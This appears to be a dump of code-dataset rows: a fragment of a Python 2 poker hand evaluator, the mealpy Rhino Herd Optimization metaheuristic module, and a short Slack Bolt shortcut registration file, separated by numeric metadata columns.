if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a4 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a4 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
list[6] = df4.iloc[i * 4 + k - 1, 13]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a4 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a4 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P5 Evaluation
# With Ace Low
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
list[6] = df5.iloc[i * 4 + k - 1, 13]
for m in range(0, 7):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a5 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a5 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
list[6] = df5.iloc[i * 4 + k - 1, 13]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a5 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[2] + 1 == list[3] and list[3] + 1 == list[4] and list[4] + 1 == list[5] and \
list[5] + 1 == \
list[6]:
a5 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# Check for Straight
if (SF > 0):
print "Straight"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for 3 of a kind
FH = 0
a1i = 0
a2i = 0
a3i = 0
a4i = 0
a5i = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
list[6] = df1.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a1i = m
break
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
list[6] = df2.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a2i = m
break
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
list[6] = df3.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a3i = m
break
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
list[6] = df4.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a4i = m
break
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
list[6] = df5.iloc[i * 4 + k - 1, 13]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5], list[6]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a5i = m
break
# Evaluating for 3 of a kind
if (FH > 0):
print "3 of a kind"
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Evaluate for two pair and one pair
f1 = [0]
f2 = [0]
f3 = [0]
f4 = [0]
f5 = [0]
a1 = [0]
a2 = [0]
a3 = [0]
a4 = [0]
a5 = [0]
Fin = 0
# Evaluate P1
TP1 = 0
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
list[6] = df1.iloc[i * 4 + k - 1, 13]
if (list[0] == list[2] or list[0] == list[3] or list[
0] == list[4] or list[0] == list[5] or list[0] == list[6]):
TP1 = TP1 + 1
f1.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4] or list[1] == list[5] or list[1] == list[6]):
TP1 = TP1 + 1
f1.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f1.append(list[1])
if TP1 > 1:
f1 = np.sort(f1[::-1]).tolist()
a1.append(f1[0])
a1.append(f1[1])
Fin = Fin + 1
# Evaluate P2
TP2 = 0
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
list[6] = df2.iloc[i * 4 + k - 1, 13]
if (list[0] == list[2] or list[0] == list[3] or
list[0] == list[4] or list[0] == list[5] or list[0] == list[6]):
TP2 = TP2 + 1
f2.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4] or list[1] == list[5] or list[1] == list[6]):
TP2 = TP2 + 1
f2.append(list[1])
if (list[0] == list[1]):
TP2 = TP2 + 1
f2.append(list[1])
if TP2 > 1:
f2 = np.sort(f2[::-1]).tolist()
a2.append(f2[0])
a2.append(f2[1])
Fin = Fin + 1
# Evaluate P3
TP3 = 0
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
list[6] = df3.iloc[i * 4 + k - 1, 13]
if (list[0] == list[2] or list[0] == list[
3] or list[0] == list[4] or list[0] == list[5] or list[0] == list[6]):
TP3 = TP3 + 1
f3.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4] or list[1] == list[5] or list[1] == list[6]):
TP3 = TP3 + 1
f3.append(list[1])
if (list[0] == list[1]):
TP3 = TP3 + 1
f3.append(list[1])
if TP3 > 1:
f3 = np.sort(f3[::-1]).tolist()
a3.append(f3[0])
a3.append(f3[1])
Fin = Fin + 1
# Evaluate P4
TP4 = 0
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
list[6] = df4.iloc[i * 4 + k - 1, 13]
if (list[0] == list[2] or list[0] == list[3] or list[0] == list[4] or list[0] == list[5] or list[0] == list[6]):
TP4 = TP4 + 1
f4.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[
4] or list[1] == list[5] or list[1] == list[6]):
TP4 = TP4 + 1
f4.append(list[1])
if (list[0] == list[1]):
TP4 = TP4 + 1
f4.append(list[1])
if TP4 > 1:
f4 = np.sort(f4[::-1]).tolist()
a4.append(f4[0])
a4.append(f4[1])
Fin = Fin + 1
# Evaluate P5
TP5 = 0
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
list[6] = df5.iloc[i * 4 + k - 1, 13]
if (list[0] == list[2] or list[0] ==
list[3] or list[0] == list[4] or list[0] == list[5] or list[0] == list[6]):
TP5 = TP5 + 1
f5.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] ==
list[4] or list[1] == list[5] or list[1] == list[6]):
TP5 = TP5 + 1
f5.append(list[1])
if (list[0] == list[1]):
TP5 = TP5 + 1
f5.append(list[1])
if TP5 > 1:
f5 = np.sort(f5[::-1]).tolist()
a5.append(f5[0])
a5.append(f5[1])
Fin = Fin + 1
#Check for two pair
if Fin > 0:
print "Two pair"
b = max(max(a1),max(a2),max(a3),max(a4),max(a5))
if max(a1) == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif max(a2) == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif max(a3) == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif max(a4) == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif max(a5) == b:
df5.iloc[i * 4 + k - 1, 14] = 1
#Check for one pair
elif TP1+TP2+TP3+TP4+TP5 > 0:
print "One pair"
b = max(max(f1),max(f2),max(f3),max(f4),max(f5))
if max(f1) == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if max(f2) == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if max(f3) == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if max(f4) == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if max(f5) == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Find the high card
print "High Card"
winner = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3])
if df1.iloc[i * 4 + k - 1, 1] == winner or df1.iloc[
i * 4 + k - 1, 3] == winner:
df1.iloc[i * 4 + k - 1, 14] = 1
if df2.iloc[i * 4 + k - 1, 1] == winner or df2.iloc[
i * 4 + k - 1, 3] == winner:
df2.iloc[i * 4 + k - 1, 14] = 1
if df3.iloc[i * 4 + k - 1, 1] == winner or df3.iloc[
i * 4 + k - 1, 3] == winner:
df3.iloc[i * 4 + k - 1, 14] = 1
if df4.iloc[i * 4 + k - 1, 1] == winner or df4.iloc[
i * 4 + k - 1, 3] == winner:
df4.iloc[i * 4 + k - 1, 14] = 1
if df5.iloc[i * 4 + k - 1, 1] == winner or df5.iloc[
i * 4 + k - 1, 3] == winner:
df5.iloc[i * 4 + k - 1, 14] = 1
df1.to_csv('P1.csv', index= False)
df2.to_csv('P2.csv', index= False)
df3.to_csv('P3.csv', index= False)
df4.to_csv('P4.csv', index= False)
df5.to_csv('P5.csv', index= False)
| 64.94594
| 152
| 0.261602
| 34,532
| 284,723
| 2.156666
| 0.004691
| 0.057738
| 0.086607
| 0.114671
| 0.987808
| 0.983927
| 0.982276
| 0.980423
| 0.976824
| 0.972984
| 0
| 0.15816
| 0.599593
| 284,723
| 4,383
| 153
| 64.960757
| 0.495092
| 0.017898
| 0
| 0.905628
| 0
| 0
| 0.001808
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.000728
| null | null | 0.011402
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f728d9b17682bd804bb3615a11c5e2ce2f618a85
| 11,026
|
py
|
Python
|
mealpy/fake/RHO.py
|
ashishpatel26/mealpy
|
62160e61b8bd4b084e44b80fda720e6bd6332e03
|
[
"MIT"
] | 1
|
2021-05-20T06:53:08.000Z
|
2021-05-20T06:53:08.000Z
|
mealpy/fake/RHO.py
|
chenyuxiang0425/mealpy
|
69e8dc727e15527e31ac5ace1debe92a0bc7d828
|
[
"MIT"
] | null | null | null |
mealpy/fake/RHO.py
|
chenyuxiang0425/mealpy
|
69e8dc727e15527e31ac5ace1debe92a0bc7d828
|
[
"MIT"
] | 1
|
2020-09-30T21:14:33.000Z
|
2020-09-30T21:14:33.000Z
|
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu Nguyen" at 14:53, 17/03/2020 %
# %
# Email: nguyenthieu2102@gmail.com %
# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %
# Github: https://github.com/thieu1995 %
#-------------------------------------------------------------------------------------------------------%
from numpy.random import uniform, normal
from numpy.linalg import norm
from numpy import exp, power, pi, zeros, array, mean, ones, dot
from math import gamma
from copy import deepcopy
from mealpy.root import Root
class OriginalRHO(Root):
    """
    The original version of: Rhino Herd Optimization (RHO)
        (A Novel Metaheuristic Algorithm inspired by Rhino Herd Behavior)
    Link:
        https://doi.org/10.3384/ecp171421026
    """

    def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True,
                 epoch=750, pop_size=100, c=0.53, a=2831, r=0.04, A=1):
        """
        Args:
            obj_func: objective function to minimize
            lb, ub: lower / upper bounds of the search space
            problem_size: number of decision variables
            batch_size, verbose: passed through to Root
            epoch: number of iterations
            pop_size: population size
            c: shape parameter - default = 0.53 > 0
            a: scale parameter - default = 2831 > 0
            r: growth rate - default = 0.04 (kept for interface parity; unused here)
            A: the area of each grid cell - default = 1
        """
        Root.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose)
        self.epoch = epoch
        self.pop_size = pop_size
        self.c = c      # shape parameter - default = 0.53 > 0
        self.a = a      # scale parameter - default = 2831 > 0
        self.r = r      # default = 0.04
        self.A = A      # the area of each grid cell - default = 1

    def train(self):
        """Run the optimization loop.

        Returns:
            (best_position, best_fitness, loss_history)
        """
        pop = [self.create_solution() for _ in range(self.pop_size)]
        g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB)
        # Epoch loop
        for epoch in range(self.epoch):
            pos_list = array([item[self.ID_POS] for item in pop])
            fit_list = array([item[self.ID_FIT] for item in pop])
            fx_list = deepcopy(fit_list)
            pos_center = mean(pos_list, axis=0)
            ## Each individual loop
            for i in range(0, self.pop_size):
                # Eq. 1: density value based on the distance to the herd center
                exp_component = -1 * power(norm(pop[i][self.ID_POS] - pos_center) / self.a, 2.0 / self.c)
                fx = 2 * exp(exp_component) / (self.c ** 2 * pi * self.a ** 2 * gamma(self.c))
                fx_list[i] = fx
            # Eq. 7: per-dimension normalization term accumulated over the herd
            s_component = ones(self.problem_size)
            for j in range(0, self.problem_size):
                sum_temp = 0
                # NOTE: renamed the inner index (was `i`) so it no longer shadows
                # the individual index used by the surrounding loops.
                for idx in range(0, self.pop_size):
                    sum_temp += fx_list[idx] * (1 + pop[idx][self.ID_POS][j] / (self.EPSILON + pop[idx][self.ID_FIT]))
                s_component[j] = self.A * sum_temp
            for i in range(0, self.pop_size):
                # BUGFIX: take a copy of the current position. The original code
                # aliased pop[i]'s stored array, so every x_new[j] assignment
                # mutated the population in place — corrupting the individual even
                # when the candidate was rejected below, and feeding already-mutated
                # earlier dimensions into the updates of later dimensions.
                x_new = deepcopy(pop[i][self.ID_POS])
                for j in range(0, self.problem_size):
                    # Eq. 7
                    s_x = fx_list[i] * (1 + pop[i][self.ID_FIT] * pop[i][self.ID_POS][j]) / s_component[j]
                    # Eq. 9: step away from / toward the coordinate with equal probability
                    if uniform() <= 0.5:
                        x_new[j] = pop[i][self.ID_POS][j] - uniform() * s_x * pop[i][self.ID_POS][j]
                    else:
                        x_new[j] = pop[i][self.ID_POS][j] + uniform() * s_x * pop[i][self.ID_POS][j]
                x_new = self.amend_position_faster(x_new)
                fit = self.get_fitness_position(x_new)
                # Greedy selection: keep the candidate only if it improves
                if fit < pop[i][self.ID_FIT]:
                    pop[i] = [x_new, fit]
            g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
            self.loss_train.append(g_best[self.ID_FIT])
            if self.verbose:
                print("> Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
        self.solution = g_best
        return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class BaseRHO(Root):
    """
    My version of: Rhino Herd Optimization (RHO)
        (A Novel Metaheuristic Algorithm inspired by Rhino Herd Behavior)
    Notes:
        + Remove third loop (position update is vectorized over dimensions)
    """

    def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True,
                 epoch=750, pop_size=100, c=0.53, a=2831, r=0.04, A=1):
        """
        Args:
            epoch: number of iterations
            pop_size: initial population size (the population grows by rate r and
                is culled back to pop_size every 100 epochs)
            c: shape parameter - default = 0.53 > 0
            a: scale parameter - default = 2831 > 0
            r: population growth rate per epoch - default = 0.04
            A: the area of each grid cell - default = 1
        """
        Root.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose)
        self.epoch = epoch
        self.pop_size = pop_size
        self.c = c      # shape parameter - default = 0.53 > 0
        self.a = a      # scale parameter - default = 2831 > 0
        self.r = r      # default = 0.04
        self.A = A      # the area of each grid cell - default = 1

    def train(self):
        """Run the optimization loop.

        Returns:
            (best_position, best_fitness, loss_history)
        """
        pop = [self.create_solution() for _ in range(self.pop_size)]
        g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB)
        pop_size = self.pop_size        # current (possibly grown) population size
        # Epoch loop
        for epoch in range(self.epoch):
            pop_new = deepcopy(pop)
            pos_list = array([item[self.ID_POS] for item in pop])
            fit_list = array([item[self.ID_FIT] for item in pop])
            fx_list = deepcopy(fit_list)
            pos_center = mean(pos_list, axis=0)
            ## Calculate the fx for each individual (Eq. 1)
            for i in range(0, pop_size):
                exp_component = -1 * power(norm(pop[i][self.ID_POS] - pos_center) / self.a, 2.0 / self.c)
                fx = 2 * exp(exp_component) / (self.c ** 2 * pi * self.a ** 2 * gamma(self.c))
                fx_list[i] = fx
            # Eq. 7: accumulated normalization term, vectorized over dimensions
            sum_temp = zeros(self.problem_size)
            for i in range(0, pop_size):
                sum_temp += fx_list[i] * (1 + pop[i][self.ID_POS] * pop[i][self.ID_FIT])
            sum_temp = self.A * sum_temp
            for i in range(0, pop_size):
                # BUGFIX: guard the division with EPSILON, as OriginalRHO does —
                # a fitness of exactly 0 previously produced inf/NaN positions here.
                s_x = fx_list[i] * (1 + pop[i][self.ID_POS] / (self.EPSILON + pop[i][self.ID_FIT])) / sum_temp
                # Eq. 9: random walk scaled by s_x
                if uniform() <= 0.5:
                    x_new = pop[i][self.ID_POS] - uniform() * dot(s_x, pop[i][self.ID_POS])
                else:
                    x_new = pop[i][self.ID_POS] + uniform() * dot(s_x, pop[i][self.ID_POS])
                x_new = self.amend_position_faster(x_new)
                fit = self.get_fitness_position(x_new)
                # Greedy selection into the shadow population
                if fit < pop[i][self.ID_FIT]:
                    pop_new[i] = [x_new, fit]
            # Herd dynamics: cull back to the base size every 100 epochs,
            # otherwise grow the herd by rate r with fresh random individuals.
            if epoch % 100 == 0:
                pop_size = self.pop_size
                pop_new = sorted(pop_new, key=lambda item: item[self.ID_FIT])
                pop = deepcopy(pop_new[:pop_size])
            else:
                pop_size = pop_size + int(self.r * pop_size)
                n_new = pop_size - len(pop)
                for _ in range(0, n_new):
                    pop_new.extend([self.create_solution()])
                pop = deepcopy(pop_new)
            g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
            self.loss_train.append(g_best[self.ID_FIT])
            if self.verbose:
                print("> Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
        self.solution = g_best
        return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class LevyRHO(BaseRHO):
    """
    My modified version of: Rhino Herd Optimization (RH)
        (A Novel Metaheuristic Algorithm inspired by Rhino Herd Behavior)
    Notes:
        + Change the flow of algorithm
        + Uses normal in equation instead of uniform
        + Uses levy-flight instead of uniform-equation
    """

    def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True,
                 epoch=750, pop_size=100, c=0.53, a=2831, r=0.04, A=1):
        BaseRHO.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose, epoch, pop_size, c, a, r, A)

    def train(self):
        """Run the optimization loop (normal-step / levy-flight variant).

        Returns:
            (best_position, best_fitness, loss_history)
        """
        pop = [self.create_solution(minmax=0) for _ in range(self.pop_size)]
        g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB)
        pop_size = self.pop_size        # current (possibly grown) population size
        # Epoch loop
        for epoch in range(self.epoch):
            pop_new = deepcopy(pop)
            pos_list = array([item[self.ID_POS] for item in pop])
            pos_center = mean(pos_list, axis=0)
            fx_list = zeros(pop_size)
            ## Calculate the fx for each individual (Eq. 1)
            for i in range(0, pop_size):
                exp_component = -1 * power(norm(pop[i][self.ID_POS] - pos_center) / self.a, 2.0 / self.c)
                fx = 2 * exp(exp_component) / (self.c ** 2 * pi * self.a ** 2 * gamma(self.c))
                fx_list[i] = fx
            # Eq. 7
            sum_temp = zeros(self.problem_size)
            # BUGFIX: iterate the current population (pop_size) — the original
            # looped over self.pop_size, silently skipping grown herd members and
            # disagreeing with fx_list (sized pop_size) and with BaseRHO.
            for i in range(0, pop_size):
                # BUGFIX: EPSILON must guard the denominator. The original wrote
                # `pos / fit + self.EPSILON`, which divides first and only then
                # adds EPSILON, leaving the division unprotected when fit == 0.
                sum_temp += fx_list[i] * (1 + pop[i][self.ID_POS] / (pop[i][self.ID_FIT] + self.EPSILON))
            sum_temp = self.A * sum_temp
            for i in range(0, pop_size):
                s_x = fx_list[i] * (1 + pop[i][self.ID_FIT] * pop[i][self.ID_POS]) / sum_temp
                # Half the time take a normal-scaled step, otherwise a levy flight
                # toward the global best.
                if uniform() < 0.5:
                    x_new = pop[i][self.ID_POS] - normal() * dot(s_x, pop[i][self.ID_POS])
                else:
                    x_new = self.levy_flight(epoch + 1, pop[i][self.ID_POS], g_best[self.ID_POS])
                x_new = self.amend_position_faster(x_new)
                fit = self.get_fitness_position(x_new)
                if fit < pop[i][self.ID_FIT]:
                    pop_new[i] = [x_new, fit]
            # Herd dynamics: cull back to the base size every 100 epochs,
            # otherwise grow the herd by rate r with fresh random individuals.
            if epoch % 100 == 0:
                pop_size = self.pop_size
                pop_new = sorted(pop_new, key=lambda item: item[self.ID_FIT])
                pop = deepcopy(pop_new[:pop_size])
            else:
                pop_size = pop_size + int(self.r * pop_size)
                n_new = pop_size - len(pop)
                for _ in range(0, n_new):
                    pop_new.extend([self.create_solution()])
                pop = deepcopy(pop_new)
            ## Make sure the population does not have duplicates.
            new_set = set()
            for idx, obj in enumerate(pop):
                if tuple(obj[self.ID_POS].tolist()) in new_set:
                    pop[idx] = self.create_solution()
                else:
                    new_set.add(tuple(obj[self.ID_POS].tolist()))
            g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
            self.loss_train.append(g_best[self.ID_FIT])
            if self.verbose:
                print("> Epoch: {}, Pop Size: {}, Best Fit: {}".format(epoch + 1, pop_size, g_best[self.ID_FIT]))
        self.solution = g_best
        return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
| 45.561983
| 112
| 0.519137
| 1,536
| 11,026
| 3.510417
| 0.122396
| 0.067878
| 0.050074
| 0.055638
| 0.840134
| 0.827337
| 0.815467
| 0.798776
| 0.777634
| 0.773182
| 0
| 0.026794
| 0.346726
| 11,026
| 241
| 113
| 45.751037
| 0.721783
| 0.166969
| 0
| 0.773585
| 0
| 0
| 0.009826
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037736
| false
| 0
| 0.037736
| 0
| 0.113208
| 0.018868
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f775432b4d5e6b1a33ee0c6ecc7e1e44e84cf48b
| 172
|
py
|
Python
|
listeners/shortcuts/__init__.py
|
slack-samples/bolt-python-starter-template
|
103bc032e8f158694dbb839beb35545685889525
|
[
"MIT"
] | 1
|
2022-03-29T16:13:25.000Z
|
2022-03-29T16:13:25.000Z
|
listeners/shortcuts/__init__.py
|
slack-samples/bolt-python-starter-template
|
103bc032e8f158694dbb839beb35545685889525
|
[
"MIT"
] | null | null | null |
listeners/shortcuts/__init__.py
|
slack-samples/bolt-python-starter-template
|
103bc032e8f158694dbb839beb35545685889525
|
[
"MIT"
] | null | null | null |
from slack_bolt import App
from .sample_shortcut import sample_shortcut_callback
def register(app: App):
    """Attach every shortcut listener in this package to the given Bolt app."""
    listener = app.shortcut("sample_shortcut_id")
    listener(sample_shortcut_callback)
| 24.571429
| 64
| 0.825581
| 24
| 172
| 5.583333
| 0.458333
| 0.41791
| 0.328358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104651
| 172
| 6
| 65
| 28.666667
| 0.87013
| 0
| 0
| 0
| 0
| 0
| 0.104651
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e3b92109278e3bea2d7ca3c6042720c5370a69f4
| 173
|
py
|
Python
|
